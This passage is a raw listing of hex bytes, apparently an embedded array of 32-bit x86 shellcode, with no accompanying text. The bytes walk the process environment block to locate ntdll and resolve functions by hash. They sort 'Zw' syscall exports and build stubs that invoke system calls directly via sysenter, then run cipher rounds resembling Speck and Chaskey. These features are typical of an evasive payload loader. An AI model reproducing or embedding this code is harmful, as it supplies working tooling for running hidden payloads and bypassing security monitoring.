1826 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x75,
1827 0x1e, 0x83, 0x45, 0x08, 0x01, 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08,
1828 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0d, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
1829 0x00, 0x84, 0xc0, 0x75, 0xd4, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x08, 0x0f,
1830 0xb6, 0x00, 0x0f, 0xbe, 0xd0, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x0f,
1831 0xbe, 0xc8, 0x89, 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb,
1832 0x27, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2,
1833 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74,
1834 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1835 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1836 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc5,
1837 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1838 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xc7, 0x45,
1839 0xfc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26,
1840 0xeb, 0x24, 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x8b,
1841 0x55, 0x08, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45, 0xf6, 0x0f,
1842 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01, 0xd0, 0x31,
1843 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xfc, 0x01, 0xd0, 0x0f, 0xb6,
1844 0x00, 0x84, 0xc0, 0x75, 0xcd, 0x8b, 0x45, 0xf8, 0xc9, 0xc3, 0x55, 0x89,
1845 0xe5, 0x53, 0x83, 0xec, 0x64, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x85, 0xc0,
1846 0x74, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe1, 0x02, 0x00, 0x00,
1847 0xc7, 0x45, 0xac, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xac, 0x64, 0x8b,
1848 0x00, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x89, 0x45, 0xdc, 0x8b, 0x45,
1849 0xdc, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xf8, 0x00, 0x00,
1850 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8,
1851 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf0, 0xe9, 0x82, 0x00, 0x00, 0x00, 0x8b,
1852 0x45, 0xf0, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x89,
1853 0x45, 0xd4, 0x8b, 0x45, 0xd4, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1854 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xd0, 0x83, 0xc0, 0x78,
1855 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x8b, 0x00, 0x89, 0x45, 0xc8, 0x83,
1856 0x7d, 0xc8, 0x00, 0x74, 0x40, 0x8b, 0x55, 0xf4, 0x8b, 0x45, 0xc8, 0x01,
1857 0xd0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x0c, 0x8b, 0x45,
1858 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0xc4, 0x8b, 0x00, 0x0d,
1859 0x20, 0x20, 0x20, 0x20, 0x3d, 0x6e, 0x74, 0x64, 0x6c, 0x75, 0x19, 0x8b,
1860 0x45, 0xc4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x0d, 0x20, 0x20, 0x20, 0x20,
1861 0x3d, 0x6c, 0x2e, 0x64, 0x6c, 0x74, 0x1e, 0xeb, 0x04, 0x90, 0xeb, 0x01,
1862 0x90, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf0,
1863 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xeb,
1864 0x01, 0x90, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1865 0x00, 0xe9, 0x03, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x18,
1866 0x89, 0x45, 0xec, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0xf4,
1867 0x01, 0xd0, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x20, 0x8b,
1868 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b, 0x45, 0xf8, 0x8b, 0x50,
1869 0x24, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0xc7, 0x45, 0xe8,
1870 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1871 0xb4, 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14, 0x85,
1872 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xbc, 0x01, 0xd0, 0x8b, 0x10, 0x8b,
1873 0x45, 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x0f, 0xb7,
1874 0x00, 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x60, 0x8b, 0x45, 0xe8, 0x8d, 0x14,
1875 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x8d, 0x1c, 0x02, 0x8b,
1876 0x45, 0xb0, 0x89, 0x04, 0x24, 0xe8, 0x32, 0xfe, 0xff, 0xff, 0x89, 0x03,
1877 0x8b, 0x45, 0xec, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
1878 0x45, 0xb8, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
1879 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x01, 0xd0, 0x8b, 0x55,
1880 0xe8, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01,
1881 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe8, 0x01, 0x81, 0x7d,
1882 0xe8, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d, 0xec, 0x01, 0x83,
1883 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x68, 0xff, 0xff, 0xff, 0xeb, 0x01, 0x90,
1884 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe8, 0x89, 0x10, 0xc7, 0x45, 0xe4, 0x00,
1885 0x00, 0x00, 0x00, 0xe9, 0xfb, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe0, 0x00,
1886 0x00, 0x00, 0x00, 0xe9, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d,
1887 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b,
1888 0x50, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x0c, 0xc5, 0x00,
1889 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
1890 0xc2, 0x0f, 0x86, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8d, 0x14,
1891 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x00,
1892 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xe0, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1893 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x45, 0xa4,
1894 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
1895 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c, 0xd5,
1896 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x00, 0x89,
1897 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5, 0x00, 0x00,
1898 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x55, 0xe0, 0x8d, 0x0c,
1899 0xd5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xb4, 0x01, 0xca, 0x8b, 0x40,
1900 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14,
1901 0xc5, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45,
1902 0xa0, 0x89, 0x02, 0x8b, 0x45, 0xe0, 0x83, 0xc0, 0x01, 0x8d, 0x14, 0xc5,
1903 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x01, 0xc2, 0x8b, 0x45, 0xa4,
1904 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1905 0x2b, 0x45, 0xe4, 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe0, 0x0f, 0x82, 0x15,
1906 0xff, 0xff, 0xff, 0x83, 0x45, 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x00,
1907 0x83, 0xe8, 0x01, 0x39, 0x45, 0xe4, 0x0f, 0x82, 0xf4, 0xfe, 0xff, 0xff,
1908 0xb8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1909 0xe5, 0x83, 0xec, 0x14, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0xff,
1910 0xff, 0xff, 0xff, 0xeb, 0x46, 0x8b, 0x45, 0x0c, 0x89, 0x04, 0x24, 0xe8,
1911 0xe2, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff, 0xff, 0xff,
1912 0xff, 0xeb, 0x30, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18,
1913 0x8b, 0x45, 0x0c, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0, 0x04, 0x39, 0x45,
1914 0x08, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x13, 0x83, 0x45, 0xfc, 0x01,
1915 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x39, 0x45, 0xfc, 0x72, 0xde, 0xb8, 0xff,
1916 0xff, 0xff, 0xff, 0xc9, 0xc3, 0x8b, 0x44, 0x24, 0x20, 0x50, 0x68, 0x27,
1917 0x6e, 0x95, 0x32, 0xe8, 0x96, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1918 0x66, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x2c,
1919 0x50, 0x68, 0x0d, 0x22, 0x5e, 0x03, 0xe8, 0x7b, 0xff, 0xff, 0xff, 0x83,
1920 0xc4, 0x08, 0xe8, 0x4b, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1921 0x44, 0x24, 0x0c, 0x50, 0x68, 0x42, 0xb8, 0xce, 0x9a, 0xe8, 0x60, 0xff,
1922 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x30, 0x01, 0x00, 0x00, 0xc3, 0x90,
1923 0x0f, 0x0b, 0x8b, 0x84, 0x24, 0xc1, 0x00, 0x00, 0x00, 0x50, 0x68, 0x53,
1924 0x91, 0x98, 0xf2, 0xe8, 0x42, 0xff, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1925 0x12, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x08,
1926 0x50, 0x68, 0xd1, 0xd6, 0x9d, 0x34, 0xe8, 0x27, 0xff, 0xff, 0xff, 0x83,
1927 0xc4, 0x08, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1928 0x44, 0x24, 0x10, 0x50, 0x68, 0x23, 0xe1, 0xbd, 0xe3, 0xe8, 0x0c, 0xff,
1929 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x90,
1930 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x18, 0x50, 0x68, 0x17, 0x15, 0x91, 0x0b,
1931 0xe8, 0xf1, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0xc1, 0x00, 0x00,
1932 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x68, 0x15,
1933 0x42, 0xb7, 0x1c, 0xe8, 0xd6, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1934 0xa6, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c,
1935 0x50, 0x68, 0x4b, 0x47, 0xa5, 0x31, 0xe8, 0xbb, 0xfe, 0xff, 0xff, 0x83,
1936 0xc4, 0x08, 0xe8, 0x8b, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1937 0x44, 0x24, 0x14, 0x50, 0x68, 0xef, 0x7f, 0x90, 0x87, 0xe8, 0xa0, 0xfe,
1938 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x70, 0x00, 0x00, 0x00, 0xc3, 0x90,
1939 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30, 0x50, 0x68, 0x2a, 0xfe, 0x9d, 0x24,
1940 0xe8, 0x85, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x55, 0x00, 0x00,
1941 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x1c, 0x50, 0x68, 0x39,
1942 0x2b, 0xcf, 0x55, 0xe8, 0x6a, 0xfe, 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8,
1943 0x3a, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b, 0x44, 0x24, 0x30,
1944 0x50, 0x68, 0x93, 0x76, 0x29, 0x34, 0xe8, 0x4f, 0xfe, 0xff, 0xff, 0x83,
1945 0xc4, 0x08, 0xe8, 0x1f, 0x00, 0x00, 0x00, 0xc3, 0x90, 0x0f, 0x0b, 0x8b,
1946 0x44, 0x24, 0x10, 0x50, 0x68, 0xf7, 0xc9, 0xac, 0xff, 0xe8, 0x34, 0xfe,
1947 0xff, 0xff, 0x83, 0xc4, 0x08, 0xe8, 0x04, 0x00, 0x00, 0x00, 0xc3, 0x90,
1948 0x0f, 0x0b, 0x89, 0xe2, 0x0f, 0x34, 0xc3, 0x90, 0x0f, 0x0b, 0x90, 0x90,
1949 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xd8,
1950 0x8b, 0x45, 0x10, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xd8, 0x8b, 0x55, 0xdc,
1951 0x89, 0x45, 0xe0, 0x89, 0x55, 0xe4, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
1952 0x00, 0xeb, 0x1c, 0x8b, 0x45, 0xfc, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
1953 0x00, 0x8b, 0x45, 0x08, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x89,
1954 0x54, 0x85, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
1955 0xde, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, 0x45,
1956 0xe0, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe4, 0x01, 0xc2, 0x8b,
1957 0x45, 0xe8, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe4, 0xc1, 0xc0,
1958 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xe4, 0x8b,
1959 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xec, 0xc1, 0xc8, 0x08, 0x89,
1960 0xc2, 0x8b, 0x45, 0xe8, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45, 0xf4,
1961 0x8b, 0x45, 0xe8, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xf4, 0x31,
1962 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xec, 0x8b, 0x45,
1963 0xf8, 0x89, 0x45, 0xf0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x1a,
1964 0x76, 0x9c, 0x8b, 0x45, 0xe0, 0x8b, 0x55, 0xe4, 0xc9, 0xc3, 0x55, 0x89,
1965 0xe5, 0x57, 0x56, 0x83, 0xec, 0x50, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xc0,
1966 0x8b, 0x45, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xe0,
1967 0x8b, 0x45, 0xc0, 0x8b, 0x55, 0xc4, 0x89, 0x45, 0xf0, 0x89, 0x55, 0xf4,
1968 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00,
1969 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0f, 0x01,
1970 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
1971 0x00, 0x84, 0xc0, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x40, 0x0f, 0x85, 0x95,
1972 0x00, 0x00, 0x00, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xe8, 0x89,
1973 0xc2, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x89, 0x54, 0x24,
1974 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24,
1975 0xe8, 0xab, 0xf7, 0xff, 0xff, 0x8d, 0x55, 0xd0, 0x8b, 0x45, 0xe8, 0x01,
1976 0xd0, 0xc6, 0x00, 0x80, 0x83, 0x7d, 0xe8, 0x0b, 0x76, 0x48, 0x8b, 0x45,
1977 0xf0, 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08,
1978 0x8d, 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x99, 0xfe, 0xff, 0xff, 0x89,
1979 0xc1, 0x33, 0x4d, 0xf0, 0x89, 0xce, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1980 0xc7, 0x89, 0x75, 0xf0, 0x89, 0x7d, 0xf4, 0xc7, 0x44, 0x24, 0x08, 0x10,
1981 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
1982 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xf7, 0xff, 0xff, 0x8b, 0x45,
1983 0xec, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xe8, 0x10, 0x00,
1984 0x00, 0x00, 0x83, 0x45, 0xe4, 0x01, 0xeb, 0x1f, 0x8b, 0x55, 0xe0, 0x8b,
1985 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8d, 0x4d, 0xd0,
1986 0x8b, 0x45, 0xe8, 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xe8, 0x01, 0x83,
1987 0x45, 0xec, 0x01, 0x83, 0x7d, 0xe8, 0x10, 0x75, 0x3c, 0x8b, 0x45, 0xf0,
1988 0x8b, 0x55, 0xf4, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d,
1989 0x45, 0xd0, 0x89, 0x04, 0x24, 0xe8, 0x16, 0xfe, 0xff, 0xff, 0x89, 0xc1,
1990 0x33, 0x4d, 0xf0, 0x89, 0x4d, 0xb8, 0x89, 0xd0, 0x33, 0x45, 0xf4, 0x89,
1991 0x45, 0xbc, 0x8b, 0x45, 0xb8, 0x8b, 0x55, 0xbc, 0x89, 0x45, 0xf0, 0x89,
1992 0x55, 0xf4, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe4,
1993 0x00, 0x0f, 0x84, 0xe7, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x8b, 0x55,
1994 0xf4, 0x83, 0xc4, 0x50, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53,
1995 0x83, 0xec, 0x10, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08,
1996 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39,
1997 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1998 0xf4, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00,
1999 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
2000 0xf8, 0x8d, 0x1c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01,
2001 0xd8, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8,
2002 0x03, 0x76, 0xc1, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xee,
2003 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83,
2004 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x89, 0x10, 0x8b,
2005 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1,
2006 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31,
2007 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b,
2008 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2009 0x08, 0x01, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b,
2010 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08,
2011 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10,
2012 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x8b, 0x45, 0xf4, 0x83,
2013 0xc0, 0x04, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x01, 0xca,
2014 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2,
2015 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x8b, 0x45,
2016 0xf4, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1,
2017 0xc0, 0x0d, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x8b, 0x10, 0x8b, 0x45, 0xf4,
2018 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0,
2019 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x8b, 0x45, 0xf4, 0x83,
2020 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x04, 0x31, 0xca,
2021 0x89, 0x10, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x8b, 0x45,
2022 0xf4, 0x83, 0xc0, 0x08, 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xf8,
2023 0x01, 0x83, 0x7d, 0xf8, 0x0f, 0x0f, 0x86, 0x08, 0xff, 0xff, 0xff, 0xc7,
2024 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x39, 0x8b, 0x45, 0xf8, 0x8d,
2025 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x8b,
2026 0x08, 0x8b, 0x45, 0xf8, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
2027 0x45, 0xf0, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x85,
2028 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31, 0xca, 0x89,
2029 0x10, 0x83, 0x45, 0xf8, 0x01, 0x83, 0x7d, 0xf8, 0x03, 0x76, 0xc1, 0x90,
2030 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
2031 0x28, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x0c, 0x89, 0x45,
2032 0xf0, 0xe9, 0xbd, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00,
2033 0x00, 0xeb, 0x19, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f,
2034 0xb6, 0x00, 0x8d, 0x4d, 0xdc, 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02,
2035 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe1, 0x8d, 0x45,
2036 0xdc, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
2037 0x00, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0x14, 0xba, 0x10, 0x00, 0x00, 0x00,
2038 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf4, 0x00,
2039 0x00, 0x00, 0x00, 0xeb, 0x26, 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf4, 0x01,
2040 0xd0, 0x0f, 0xb6, 0x08, 0x8d, 0x55, 0xdc, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
2041 0x0f, 0xb6, 0x10, 0x8b, 0x5d, 0xf8, 0x8b, 0x45, 0xf4, 0x01, 0xd8, 0x31,
2042 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45,
2043 0xec, 0x72, 0xd2, 0x8b, 0x45, 0xec, 0x29, 0x45, 0x14, 0x8b, 0x45, 0xec,
2044 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x20,
2045 0x8b, 0x45, 0xf4, 0x8d, 0x50, 0xff, 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x0f,
